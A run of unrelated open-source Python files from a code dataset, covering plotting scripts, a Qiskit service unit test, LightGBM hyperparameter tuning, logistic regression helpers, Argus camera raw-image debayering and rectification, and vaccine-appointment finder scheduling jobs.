plot_off_mesh(args.filename)\n\n","repo_name":"smjim/mcStas_optimization_reduction","sub_path":"plot_off.py","file_name":"plot_off.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37906299368","text":"import numpy as np\nfrom bipedalwalker.utils import utils\nimport matplotlib.pyplot as plt\n\n\n# # CACLA training\n# ep_reward_str = \"../gcloud-data/CACLA/ep_reward_arr.csv\"\n# posX_str = \"../gcloud-data/CACLA/posX_arr.csv\"\n\n# SPG training\nep_reward_str = \"../gcloud-data/SPG/ep_reward_arr.csv\"\navg_reward_str = \"../gcloud-data/SPG/avg_reward_arr.csv\"\nposX_str = \"../gcloud-data/SPG/posX_arr.csv\"\n\n# # CACLA testing\n# ep_reward_str = \"CACLA-ep_reward_arr.csv\"\n# avg_reward_str = \"CACLA-avg_reward_arr.csv\"\n# posX_str = \"CACLA-posX_arr.csv\"\n# t_str = \"CACLA-t_arr.csv\"\n\n# # SPG testing\n# ep_reward_str = \"SPG-ep_reward_arr.csv\"\n# avg_reward_str = \"SPG-avg_reward_arr.csv\"\n# posX_str = \"SPG-posX_arr.csv\"\n# t_str = \"SPG-t_arr.csv\"\n\nep_reward_arr = np.asarray(utils.loadFromCSV(ep_reward_str))\nposX_arr = np.asarray(utils.loadFromCSV(posX_str))\n# t_arr = np.asarray(utils.loadFromCSV(t_str))\navg_reward_arr = np.cumsum(ep_reward_arr)\nutils.saveToCSV(avg_reward_arr, avg_reward_str)\n\n# # plt.plot(ep_reward_arr)\n# plt.bar(np.arange(np.size(ep_reward_arr)), np.ravel(ep_reward_arr), width=0.2)\n# plt.title(\"CACLA Training Episode Reward\")\n# plt.xlabel(\"Episode\")\n# plt.ylabel(\"Reward\")\n# plt.show()\n#\n# # plt.plot(avg_reward_arr)\n# plt.bar(np.arange(np.size(avg_reward_arr)), np.ravel(avg_reward_arr), width=0.3)\n# plt.title(\"CACLA Training Average Reward\")\n# plt.xlabel(\"Episode\")\n# plt.ylabel(\"Reward\")\n# plt.show()\n#\n# # plt.plot(posX_arr)\n# plt.bar(np.arange(np.size(posX_arr)), np.ravel(posX_arr), width=0.4)\n# plt.title(\"CACLA Training Episode Last PosX\")\n# plt.xlabel(\"Episode\")\n# plt.ylabel(\"Position\")\n# plt.show()\n\n# # plt.plot(t_arr)\n# plt.bar(np.arange(np.size(t_arr)), np.ravel(t_arr))\n# plt.title(\"N timesteps before finish\")\n# plt.show()","repo_name":"RUKip/MachineLearningProject","sub_path":"bipedalwalker/makegraphs.py","file_name":"makegraphs.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"6234847383","text":"import unittest\nfrom datetime import timedelta, datetime\nfrom test.service.ibm_test_case import IBMTestCase\nimport pandas as pd\nfrom qiskit_ibm_experiment import IBMExperimentService, AnalysisResultData\nfrom qiskit_ibm_experiment.service.constants import RESULT_QUALITY_FROM_DATAFRAME\n\n\nclass TestExperiment(IBMTestCase):\n \"\"\"Test experiment.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Initial class level setup.\"\"\"\n # pylint: disable=arguments-differ\n super().setUpClass()\n cls._setup_service()\n\n @classmethod\n def _setup_service(cls):\n \"\"\"Get the service for the class.\"\"\"\n cls.service = IBMExperimentService(local=True)\n\n def test_default_preferences(self):\n \"\"\"Test getting default preferences.\"\"\"\n self.assertFalse(self.service.preferences[\"auto_save\"])\n\n def test_set_preferences(self):\n \"\"\"Test setting preferences.\"\"\"\n self.service.preferences[\"auto_save\"] = True\n self.assertTrue(self.service.preferences[\"auto_save\"])\n\n def test_default_options(self):\n \"\"\"Test getting default options.\"\"\"\n 
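Annotation: plot_off.py above rescales the mesh into the unit cube with (v - min) / (max - min) per axis; note this divides by zero whenever an axis is degenerate (all vertices coplanar). A guarded version of the same transform:

import numpy as np

def to_unit_cube(vertices):
    lo = vertices.min(axis=0)
    span = vertices.max(axis=0) - lo
    span[span == 0] = 1.0                    # flat axis: avoid 0/0, leave coords at 0
    return (vertices - lo) / span

v = np.array([[0., 0., 5.], [2., 4., 5.], [1., 2., 5.]])   # z is degenerate
print(to_unit_cube(v))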
self.assertTrue(self.service.options[\"prompt_for_delete\"])\n\n def test_set_options(self):\n \"\"\"Test setting options.\"\"\"\n original_options = self.service.options\n self.service.set_option(prompt_for_delete=False)\n self.assertFalse(self.service.options[\"prompt_for_delete\"])\n self.service.options = original_options\n\n def test_prompt_for_delete_options(self):\n \"\"\"Test delete prompt is not displayed given the corresponding option\"\"\"\n original_options = self.service.options\n self.service.set_option(prompt_for_delete=False)\n self.assertTrue(\n self.service._confirm_delete(\"\")\n ) # should work without mock patch\n self.service.options = original_options\n\n def test_dataframe_to_analysis_result_list(self):\n \"\"\"Test conversion from dataframe to result list\"\"\"\n num_values = 2\n analysis_result_values = [\n {\"str\": \"foo\", \"float\": 3.14},\n {\"int\": 3, \"float\": 2.78},\n ]\n result_ids = [\n \"9347d04d97464c5c80bf10b064064914\",\n \"ca2a0a92d4224ea1802c48d1785a6ce7\",\n ]\n\n experiment_ids = [\n \"4347d04d97364c5c80bf10b064064914\",\n \"ba2a0a92d4224ea1802c48d1785a6ce8\",\n ]\n\n tags = [[\"qiskit_test\", \"foo\"], []]\n result_types = [\"type_A\", \"type_B\"]\n result_quality = [\"good\", \"bad\"]\n backends = [\"backend1\", \"backend2\"]\n device_components = [[\"Q0\", \"Q1\"], [\"Q2\"]]\n experiments = [\"T1\", \"T2\"]\n chisqs = [0.3, 0.5]\n sources = [\"qiskit\", \"qiskit\"]\n extras = [None, None]\n created_times = [\n datetime.now() - timedelta(days=1),\n datetime.now() - timedelta(days=2),\n ]\n d = {\n \"_result_id\": result_ids,\n \"_experiment_id\": experiment_ids,\n \"_tags\": tags,\n \"value\": analysis_result_values,\n \"name\": result_types,\n \"quality\": result_quality,\n \"components\": device_components,\n \"backend\": backends,\n \"experiment\": experiments,\n \"created_time\": created_times,\n \"chisq\": chisqs,\n \"_source\": sources,\n \"_extra\": extras,\n }\n df = pd.DataFrame(data=d)\n results = IBMExperimentService.dataframe_to_analysis_result_list(df)\n expected_results = [\n AnalysisResultData(\n result_id=result_ids[i],\n experiment_id=experiment_ids[i],\n result_data={\n \"_value\": analysis_result_values[i],\n \"_experiment\": experiments[i],\n \"_source\": sources[i],\n \"_extra\": extras[i],\n },\n result_type=result_types[i],\n quality=RESULT_QUALITY_FROM_DATAFRAME[result_quality[i]],\n backend_name=backends[i],\n creation_datetime=created_times[i],\n device_components=device_components[i],\n tags=tags[i],\n chisq=chisqs[i],\n )\n for i in range(num_values)\n ]\n for (result, expected_result) in zip(results, expected_results):\n self.assertEqual(result, expected_result)\n\n result_df = IBMExperimentService.analysis_result_list_to_dataframe(results)\n self.assertEqual(result_df.to_dict(), df.to_dict())\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Qiskit-Extensions/qiskit-ibm-experiment","sub_path":"test/service/test_experiment.py","file_name":"test_experiment.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"24022109327","text":"from lightgbm import LGBMClassifier\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom lgbm_autotune.model.bagging_models import BaggingModels\n\n\nclass Objective:\n \"optuna tuning and stratified k-fold\"\n\n def __init__(self, X, y, model_registry):\n self.X = X\n self.y = y\n self.model_registry = model_registry\n\n 
def __call__(self, trial):\n static_params = {\n \"random_state\": 123,\n \"boosting_type\": \"gbdt\",\n \"objective\": \"binary\",\n }\n\n tune_params = {\n \"n_estimators\": trial.suggest_int(\"n_estimators\", 1, 10000),\n \"num_leaves\": trial.suggest_int(\"num_leaves\", 2, 256),\n \"min_child_samples\": trial.suggest_int(\"min_child_samples\", 3, 200),\n \"max_depth\": trial.suggest_int(\"max_depth\", 1, 8),\n \"learning_rate\": trial.suggest_float(\"learning_rate\", 0.01, 0.3),\n }\n\n all_params = {\n **tune_params,\n **static_params,\n }\n\n trial.set_user_attr(\"all_params\", all_params)\n\n # 5-Fold Stratified CV\n skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=123)\n\n # 各分割でのスコアを保存するリスト\n scores = []\n models = []\n\n for train_index, valid_index in skf.split(self.X, self.y):\n model = LGBMClassifier(**all_params)\n\n # データの分割\n X_train, X_valid = (\n self.X.iloc[train_index],\n self.X.iloc[valid_index],\n )\n y_train, y_valid = (\n self.y.iloc[train_index],\n self.y.iloc[valid_index],\n )\n\n model.fit(X_train, y_train, eval_metric=\"auc\")\n models.append(model)\n\n # モデルの評価\n y_pred = model.predict_proba(X_valid)[:, 1]\n score = roc_auc_score(y_valid, y_pred)\n\n # スコアの保存\n scores.append(score)\n\n bagging_model = BaggingModels(models=models)\n self.model_registry.register(trial.number, bagging_model)\n\n return sum(scores) / len(scores)\n","repo_name":"shogo-hs/LGBM-AutoTune","sub_path":"lgbm_autotune/model/objective.py","file_name":"objective.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"138244838","text":"import random\nimport numpy as np\nimport get_data\n# print(get_data.X_subset.shape)\n# print(get_data.y_subset.size)\n# print(get_data.y_subset[0:10])\n\n# def sigmoid(x,w,b): # takes single datapoint x\n# z=x*w.transpose() +b\n# s = 1/(1+np.exp(-z))\n# return\ndef sigmoid(x):\n # Activation function used to map any real value between 0 and 1\n return 1 / (1 + np.exp(-x))\n\ndef net_input(w, x):\n # Computes the weighted sum of inputs\n # print(x.size,w.size)\n return np.dot(x, w)\n\ndef probability(w, x):\n # Returns the probability after passing through sigmoid\n return sigmoid(net_input(w, x))\n\ndef cost_function(w, x, y):\n # Computes the cost function for all the training samples\n m = x.shape[0]\n y_alt= (y%9)/2\n total_cost = -(1 / m) * np.sum(y_alt * np.log(probability(w, x)) + (1 - y_alt) * np.log(\n 1 - probability(w, x)))\n return total_cost\n\ndef gradient(theta, x, y):\n # Computes the gradient of the cost function at the point theta\n m = x.shape[0]\n return (1 / m) * np.dot(x.transpose(), sigmoid(net_input(theta, x)) - y)\n\ndef prediction(w,x):\n p=probability(w,x)\n for i in range(p.size):\n if(p[i]>=0.5):\n p[i]=1\n else:\n p[i]=0\n return p\n\ndef error(w,x,y):\n p=prediction(w,x)\n m=y.size\n y=(y%9)/2\n error=0\n for i in range(p.size):\n if(p[i]!=y[i]):\n error=error+1\n error=error/m\n return error\ndef stochastic_gd(sample, label, num_it, learn_rate):\n n=label.shape[0]\n m=sample.shape[1]\n label=(label%9)/2\n w=np.ones(m)\n for i in range(num_it):\n nth=random.randint(0,int(n-1))\n xth=sample[nth:nth+1, :]\n yth= label[nth:nth+1]\n w=w-learn_rate*gradient(w,xth,yth)\n return 
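Annotation: Objective.__call__ above averages ROC-AUC over a 5-fold StratifiedKFold, fitting one LGBMClassifier per fold and bagging them. The CV skeleton with a plain sklearn model, so it runs without LightGBM or Optuna (the model and synthetic data are substitutes, not the record's setup):

import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import StratifiedKFold

X, y = make_classification(n_samples=300, random_state=123)
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=123)

scores = []
for train_idx, valid_idx in skf.split(X, y):
    model = LogisticRegression(max_iter=1000).fit(X[train_idx], y[train_idx])
    pred = model.predict_proba(X[valid_idx])[:, 1]       # P(class 1) for AUC
    scores.append(roc_auc_score(y[valid_idx], pred))
print('mean CV AUC:', np.mean(scores))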
w\n\n","repo_name":"tarxn/ELL409_assignments","sub_path":"Assignment_1/gd_functions.py","file_name":"gd_functions.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12466552594","text":"import yaml\nimport numpy as np\nimport cv2\nimport scipy.spatial.qhull as qhull\n\n'''\nArgus specific class and class functions to work with *.raw Argus sensor data\n\nDeBayering workflow:\n 1. Initialize cameraIO object\n 2. Call readRaw()\n 3. Call deBayerRawFrameOpenCV() if grayscale desired\n - Grayscale frame now saved in self.imGray\n OR\n Call deBayerRawFrameOpenCVForColor() if RBG desired\n - RGB components saved in self.imR, self.imG, self.imB\n'''\n\nclass cameraIO():\n '''\n Class containing camera data and functions'''\n\n def __init__(self, **kwargs):\n\n self.cameraID = kwargs.get('cameraID', 'c1')\n self.rawPath = kwargs.get('rawPath')\n self.yamlPath = kwargs.get('yamlPath', 'D:/WAMToolbox/cameraData.yml')\n self.nFrames = kwargs.get('nFrames', 1)\n self.xMin = kwargs.get('xMin', 0)\n self.xMax = kwargs.get('xMax', 500)\n self.yMin = kwargs.get('yMin', 0)\n self.yMax = kwargs.get('yMax', 1200)\n self.dx = kwargs.get('dx', 1)\n self.skip = kwargs.get('skip', 0)\n self.verbose = kwargs.get('verbose', True) # turn on/off print statements\n self.parallel = kwargs.get('parallel', True)\n def getCameraData(self):\n\n '''\n Loads camera data from yamlPath file containing camera intrinsic and extrinsic values\n \n '''\n with open(self.yamlPath, 'r') as f:\n self.cameraData = yaml.load(f, Loader=yaml.FullLoader)\n\n def readRaw(self):\n '''\n This function is utilized for opening *.raw Argus files prior to a debayering task,\n and adds the\n\n Must call this function before calling any debayering functions\n '''\n with open(self.rawPath, \"rb\") as my_file:\n self.fh = my_file\n cameraIO.readHeaderLines(self)\n cameraIO.readAIIIrawFullFrame(self)\n\n def readHeaderLines(self):\n '''\n Reads the header lines of a .raw file to obtain metadata to\n feed into deBayering function\n\n '''\n\n separated = dict()\n lines = dict()\n for i in range(25):\n lines[i] = self.fh.readline().decode(\"utf-8\").rstrip()\n\n temp = lines[i].split(':')\n if len(temp) != 1:\n temp1 = temp[0]\n temp2 = float(temp[1])\n separated[temp1] = temp2\n else:\n temp = lines[i].split(';')\n if len(temp) != 1:\n temp1 = temp[0]\n temp2 = temp[1]\n separated[temp1] = temp2\n\n self.header = separated\n self.w = int(separated['cameraWidth'])\n self.h = int(separated['cameraHeight'])\n\n def readAIIIrawCropped(self):\n \n '''\n This function reads AIII raw files and populates the self.raw object\n by reading the *.raw file frame by frame and adding each to the multi-\n dimensional array and cropping the frames based on the user defined\n umin, umax, vmin, vmax\n\n Attributes:\n self.raw: (ndarray) contains all raw sensor data from one camera,\n read from self.rawPath\n \n '''\n self.umin = self.cameraData[self.cameraID]['umin']\n self.umax = self.cameraData[self.cameraID]['umax']\n self.vmin = self.cameraData[self.cameraID]['vmin']\n self.vmax = self.cameraData[self.cameraID]['vmax']\n skipoffset = self.skip*32 + self.skip*self.w*self.h\n self.fh.seek(30, 1)\n\n print(\"working on camera\", self.cameraID)\n\n if skipoffset > 0:\n for i in range(self.nFrames):\n print(\"Reading frame {}\".format(i))\n if i == 0:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=skipoffset)\n else:\n binary = 
np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=32)\n\n data = np.uint8(binary)\n del binary\n if i == 0:\n crop = data.reshape((self.h, self.w))\n del data\n I = crop[self.vmin:(self.vmax), self.umin:(self.umax)]\n else:\n crop = data.reshape((self.h, self.w))\n del data\n I = np.dstack((I, crop[self.vmin:(self.vmax), self.umin:(self.umax)]))\n\n del crop\n\n else:\n\n for i in range(self.nFrames):\n print(\"Reading frame {}\".format(i))\n if i == 0:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h)\n else:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=32)\n\n data = np.uint8(binary)\n del binary\n if i == 0:\n crop = data.reshape((self.h, self.w))\n del data\n I = crop[self.vmin:(self.vmax), self.umin:(self.umax)]\n else:\n crop = data.reshape((self.h, self.w))\n del data\n I = np.dstack((I, crop[self.vmin:(self.vmax), self.umin:(self.umax)]))\n\n del crop\n\n self.raw = I\n\n def readAIIIrawFullFrame(self):\n\n '''\n This function reads AIII raw files and populates the self.raw object\n by reading the *.raw file frame by frame and adding each to the multi-\n dimensional array without cropping the frames\n\n Attributes:\n self.raw: (ndarray) contains all raw sensor data from one camera,\n read from self.rawPath\n \n '''\n\n skipoffset = self.skip*32 + self.skip*self.w*self.h\n self.fh.seek(30, 1)\n if skipoffset > 0:\n for i in range(self.nFrames):\n\n if i == 0:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=skipoffset)\n else:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=32)\n\n data = np.uint8(binary)\n del binary\n\n if i == 0:\n I = data.reshape((self.h, self.w))\n else:\n I = np.dstack((I, data.reshape((self.h, self.w))))\n\n del data\n self.raw = I\n\n else:\n\n for i in range(self.nFrames):\n if i%20 == 0 and self.verbose==True: print(f\"Reading rawFile {i/self.nFrames*100:.1f} %\")\n if i == 0:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h)\n else:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=32)\n\n data = np.uint8(binary)\n del binary\n if i == 0:\n I = data.reshape((self.h, self.w))\n else:\n I = np.dstack((I, data.reshape((self.h, self.w))))\n\n del data\n self.raw = I\n\n def deBayerRawFrame(self):\n '''\n deBayers a raw frame using Argus framework, adapted from\n original Matlab code from John Stanley\n\n Attributes:\n self.imGray:\n \n '''\n\n im = np.zeros(np.shape(self.raw))\n imGray = np.zeros(np.shape(self.raw))\n imR = np.zeros(np.shape(self.raw))\n imB = np.zeros(np.shape(self.raw))\n imG = np.zeros(np.shape(self.raw))\n\n for ib in range(self.nFrames):\n\n print('DeBayering frame {}'.format(ib))\n frame = self.raw[:, :, ib]\n\n # python code adpoted from Argus framework\n Bmin = [1, 3]\n Rmin = [2, 2]\n Gmin = [2, 3, 3, 2]\n\n B = frame.copy()\n xx = np.arange(Bmin[0], self.h, 2)\n for j in range(Bmin[1], self.w - 1, 2):\n B[xx - 1, j - 1] = np.mean((B[xx - 1, j - 2], B[xx - 1, j]), axis=0)\n\n for i in range(Bmin[0] + 1, self.h - 1, 2):\n B[i - 1, :] = np.mean((B[i - 2, :], B[i, :]), axis=0)\n\n R = frame.copy()\n xx = np.arange(Rmin[0], self.h - 1, 2)\n for j in range(Rmin[1], self.w - 1, 2):\n R[xx - 1, j - 1] = np.mean((R[xx - 1, j - 2], R[xx - 1, j]), axis=0)\n for i in range(Rmin[0] + 1, self.h - 1, 2):\n R[i - 1, :] = np.mean((R[i - 2, :], R[i, :]), axis=0)\n\n G = frame.copy()\n for i in range(Gmin[0], self.h - 1, 2):\n for j in 
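Annotation: readAIIIrawFullFrame above walks the .raw file as [header][frame][32-byte gap][frame]..., pulling each w*h block with np.fromfile and a per-frame offset. The same layout logic on an in-memory stand-in (np.fromfile needs a real file, so np.frombuffer plus an explicit seek is the BytesIO-friendly equivalent; the 2x3 frames and 4-byte gap are invented):

import io
import numpy as np

w, h, gap, n_frames = 3, 2, 4, 2
payload = bytes(range(w * h)) + b'\x00' * gap + bytes(range(100, 100 + w * h))
fh = io.BytesIO(payload)

frames = []
for i in range(n_frames):
    if i > 0:
        fh.seek(gap, 1)                       # skip the inter-frame header bytes
    buf = fh.read(w * h)
    frames.append(np.frombuffer(buf, dtype=np.uint8).reshape(h, w))
print(np.dstack(frames).shape)                # (2, 3, 2): height x width x frames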
range(Gmin[1], self.w - 1, 2):\n G[i - 1, j - 1] = np.mean((G[i - 2, j - 1], G[i, j - 1], G[i - 1, j], G[i - 1, j - 2]), axis=0)\n\n for i in range(Gmin[2], self.h - 1, 2):\n for j in range(Gmin[3], self.w - 1, 2):\n G[i - 1, j - 1] = np.mean((G[i - 2, j - 1], G[i, j - 1], G[i - 1, j], G[i - 1, j - 2]), axis=0)\n\n rgbArray = np.zeros((2048, 2448, 3), 'uint8')\n rgbArray[..., 0] = R\n rgbArray[..., 1] = G\n rgbArray[..., 2] = B\n imGrayscale = cv2.cvtColor(rgbArray, cv2.COLOR_BGR2GRAY)\n\n imGray[:, :, ib] = imGrayscale\n\n self.imGray = imGray\n\n def deBayerRawFrameOpenCVForColor(self):\n '''\n deBayers a raw frame utilizing the package opencv\n \n Use this function for debayering into an RGB image output\n \n '''\n\n im = np.zeros(np.shape(self.raw), dtype='uint8')\n\n imR = np.zeros(np.shape(self.raw), dtype='uint8')\n imB = np.zeros(np.shape(self.raw), dtype='uint8')\n imG = np.zeros(np.shape(self.raw), dtype='uint8')\n\n for ib in range(self.nFrames):\n\n print('DeBayering frame {}'.format(ib))\n frame = self.raw[:, :, ib]\n framecopy = np.uint8(frame)\n rgbArray = cv2.cvtColor(framecopy, cv2.COLOR_BayerGB2BGR)\n\n imR[:, :, ib] = rgbArray[:, :, 2]\n imB[:, :, ib] = rgbArray[:, :, 0]\n imG[:, :, ib] = rgbArray[:, :, 1]\n \n self.imR = imR\n self.imG = imG\n self.imB = imB\n\n def deBayerRawFrameOpenCV(self):\n\n '''\n deBayers a raw frame utilizing the package opencv\n \n Use this function for debayering into an grayscale\n image output\n \n '''\n\n im = np.zeros(np.shape(self.raw), dtype='uint8')\n self.imGrayCV = np.zeros(np.shape(self.raw), dtype='uint8')\n imR = np.zeros(np.shape(self.raw), dtype='uint8')\n imB = np.zeros(np.shape(self.raw), dtype='uint8')\n imG = np.zeros(np.shape(self.raw), dtype='uint8')\n\n if self.nFrames == 1: # used for limited memory operations\n frame = self.raw\n framecopy = np.uint8(frame)\n rgbArray = cv2.cvtColor(framecopy, cv2.COLOR_BayerGB2BGR)\n\n imGrayscale = cv2.cvtColor(rgbArray, cv2.COLOR_BGR2GRAY)\n self.imGrayCV[:, :] = np.uint8(imGrayscale)\n elif self.parallel is True:\n import multiprocessing as mp\n pool = mp.Pool(mp.cpu_count() - 1)\n # https://www.machinelearningplus.com/python/parallel-processing-python/\n imGrayscale = pool.starmap_async(cv2.cvtColor, [(np.uint8(self.raw[:,:,ib]), cv2.COLOR_BayerGB2GRAY)\n for ib in range(self.nFrames)]).get()\n pool.close()\n self.imGrayCV = np.array(imGrayscale, dtype=np.uint8)\n\n else:\n for ib in range(self.nFrames):\n if ib % 20 == 0 and self.verbose==True:\n print(f'debayering frame {ib}/{self.nFrames}')\n frame = self.raw[:, :, ib]\n framecopy = np.uint8(frame)\n rgbArray = cv2.cvtColor(framecopy, cv2.COLOR_BayerGB2BGR)\n imGrayscale = cv2.cvtColor(rgbArray, cv2.COLOR_BGR2GRAY)\n\n self.imGrayCV[:, :, ib] = np.uint8(imGrayscale)\n \n '''\n\n The following functions are utilized in rectification tasks specific to Argus,\n however they are no longer supported and maintained. 
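Annotation: the hand-rolled deBayerRawFrame above interpolates the R/G/B planes neighbour by neighbour; OpenCV's demosaicing does the same job in one call, which is what the *OpenCV variants of this class rely on. An end-to-end call on a synthetic mosaic (the Bayer code follows the record; the image content is random):

import numpy as np
import cv2

mosaic = np.random.default_rng(0).integers(0, 256, size=(8, 8), dtype=np.uint8)
bgr = cv2.cvtColor(mosaic, cv2.COLOR_BayerGB2BGR)    # debayer in one call
gray = cv2.cvtColor(bgr, cv2.COLOR_BGR2GRAY)         # then grayscale, as in the record
print(bgr.shape, gray.shape)                         # (8, 8, 3) (8, 8)

cv2.COLOR_BayerGB2GRAY also exists and skips the intermediate BGR image, which is what the record's parallel branch uses.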
For further photogrammetry\n tasks, refer to the corefunctions module within CoastalImageLib.\n \n '''\n\n def uvToXY(self):\n # Do we trust the edges?\n self.umin = self.cameraData[self.cameraID]['umin']\n self.umax = self.cameraData[self.cameraID]['umax']\n self.vmin = self.cameraData[self.cameraID]['vmin']\n self.vmax = self.cameraData[self.cameraID]['vmax']\n self.m = self.cameraData[self.cameraID]['m']\n Uu, Vv = np.meshgrid(np.arange(self.umin, self.umax, 1), np.arange(self.vmin, self.vmax, 1))\n\n U = Uu.ravel()\n V = Vv.ravel()\n # Change from Walton m-vector notation to DLT notation so don't have to use subscripts\n A = self.m[0]\n B = self.m[1]\n C = self.m[2]\n D = self.m[3]\n E = self.m[4]\n F = self.m[5]\n G = self.m[6]\n H = self.m[7]\n J = self.m[8]\n K = self.m[9]\n L = self.m[10]\n\n # Assign variable names to coefficients derived in solving for x,y, or z\n M = (E * U - A)\n N = (F * U - B)\n O = (G * U - C)\n P = (D - U)\n Q = (E * V - H)\n R = (F * V - J)\n S = (G * V - K)\n T = (L - V)\n\n Z = 0 * np.ones(len(U), )\n X = np.divide((np.multiply(np.multiply(N, S) - np.multiply(R, O), Z) + (np.multiply(R, P) - np.multiply(N, T))),\n (np.multiply(R, M) - np.multiply(N, Q)))\n Y = np.divide((np.multiply(np.multiply(M, S) - np.multiply(Q, O), Z) + (np.multiply(Q, P) - np.multiply(M, T))),\n (np.multiply(Q, N) - np.multiply(M, R)))\n\n self.Xx = np.reshape(X, [(self.vmax - self.vmin), (self.umax - self.umin)])\n self.Yy = np.reshape(Y, [(self.vmax - self.vmin), (self.umax - self.umin)])\n self.X = X\n self.Y = Y\n\n def cropFrames(self):\n\n '''\n Function called to crop a debayered frame\n \n '''\n\n self.gray = np.zeros(((self.vmax - self.vmin), (self.umax - self.umin), self.nFrames), dtype='uint8')\n\n if self.nFrames == 1:\n self.gray = self.imGrayCV[self.vmin:(self.vmax), self.umin:(self.umax)]\n else:\n for i in range(self.nFrames):\n self.gray[:, :, i] = self.imGrayCV[self.vmin:(self.vmax), self.umin:(self.umax), i]\n\n def frameInterp(self):\n\n self.xy = np.zeros([len(self.X), 2])\n self.xy[:, 0] = self.Y.flatten()\n self.xy[:, 1] = self.X.flatten()\n\n self.xnew = np.arange(self.xMin, self.xMax, self.dx)\n self.ynew = np.arange(self.yMin, self.yMax, self.dx)\n\n xgrid, ygrid = np.meshgrid(self.xnew, self.ynew)\n self.uv = np.zeros([xgrid.shape[0] * xgrid.shape[1], 2])\n self.uv[:, 0] = ygrid.flatten()\n self.uv[:, 1] = xgrid.flatten()\n\n cameraIO.interpWeights(self)\n\n self.grayInterp = np.zeros((len(self.ynew), len(self.xnew), self.nFrames), dtype='uint8')\n print(np.shape(self.grayInterp))\n\n if self.nFrames == 1:\n returned = cameraIO.interpolate(self, self.gray)\n self.grayInterp = returned.reshape(xgrid.shape[0], xgrid.shape[1])\n else:\n for i in range(self.nFrames):\n #print(\"interpolating frame {}\".format(i))\n returned = cameraIO.interpolate(self, self.gray[:, :, i])\n self.grayInterp[:, :, i] = returned.reshape(xgrid.shape[0], xgrid.shape[1])\n \n self.xgrid = xgrid\n self.ygrid = ygrid\n\n def interpWeights(self):\n #def interp_weights(xy, uv,d=2):\n #print(\"calculating Delauny for camera\", self.cameraID)\n tri = qhull.Delaunay(self.xy)\n simplex = tri.find_simplex(self.uv)\n vertices = np.take(tri.simplices, simplex, axis=0)\n temp = np.take(tri.transform, simplex, axis=0)\n delta = self.uv - temp[:, 2]\n bary = np.einsum('njk,nk->nj', temp[:, :2, :], delta)\n self.vtx = vertices\n self.wts = np.hstack((bary, 1 - bary.sum(axis=1, keepdims=True)))\n\n def interpolate(self, values):\n ret = np.einsum('nj,nj->n', np.take(values, self.vtx), self.wts)\n 
ret[np.any(self.wts < 0, axis=1)] = np.nan\n return ret","repo_name":"mailemccann/coastalimagelib","sub_path":"coastalimagelib/argusIO.py","file_name":"argusIO.py","file_ext":"py","file_size_in_byte":16459,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"30484780532","text":"import os\nimport logging\nimport datetime\n\nfrom vaccine_finder.config import (\n DEFAULT_INPUT_FILE,\n WINDOW_START,\n WINDOW_END,\n NOTIFY_VACCINE_USERS,\n DEBUG_VACCINE_FINDER,\n)\nfrom vaccine_finder.riteaid.finder import RiteAidAppointmentFinder\nfrom vaccine_finder.walgreens.finder import WalgreensAppointmentFinder\nfrom vaccine_finder.wegmans.finder import WegmansAppointmentFinder\nfrom vaccine_finder.allentown.finder import AllentownAppointmentFinder\n\n\nlogger = logging.getLogger('Jobs')\n\n\ndef in_range(t, start=WINDOW_START, end=WINDOW_END):\n \"\"\"\n Check whether a time falls within a time window\n \"\"\"\n if (t >= start) and (t <= end):\n return True\n return False\n\n\ndef _finder_job(finder):\n \"\"\"\n Vaccine Finder Job during time window\n \"\"\"\n t = datetime.datetime.now().time()\n logger.info(f\"Time: {t}, Window: {WINDOW_START} to {WINDOW_END}\")\n\n if in_range(datetime.datetime.now().time()):\n finder.find(notify=NOTIFY_VACCINE_USERS)\n else:\n logger.info(\n 'Not time to run type(finder).__name__ finder. Sleeping ...'\n )\n\n\ndef allentown_job():\n \"\"\"\n Allentown Health Clinic Vaccine Finder Job during time window\n \"\"\"\n f = AllentownAppointmentFinder(\n input_file=DEFAULT_INPUT_FILE,\n debug=DEBUG_VACCINE_FINDER\n )\n _finder_job(f)\n\n\ndef wegmans_job():\n \"\"\"\n Wegmans Vaccine Finder Job during time window\n \"\"\"\n f = WegmansAppointmentFinder(\n input_file=DEFAULT_INPUT_FILE,\n debug=DEBUG_VACCINE_FINDER\n )\n _finder_job(f)\n\n\ndef walgreens_job():\n \"\"\"\n Walgreens Vaccine Finder Job during time window\n \"\"\"\n f = WalgreensAppointmentFinder(\n input_file=DEFAULT_INPUT_FILE,\n debug=DEBUG_VACCINE_FINDER\n )\n _finder_job(f)\n\n\ndef riteaid_job():\n \"\"\"\n Riteaid Vaccine Finder Job during time window\n \"\"\"\n f = RiteAidAppointmentFinder(\n input_file=DEFAULT_INPUT_FILE,\n debug=DEBUG_VACCINE_FINDER\n )\n 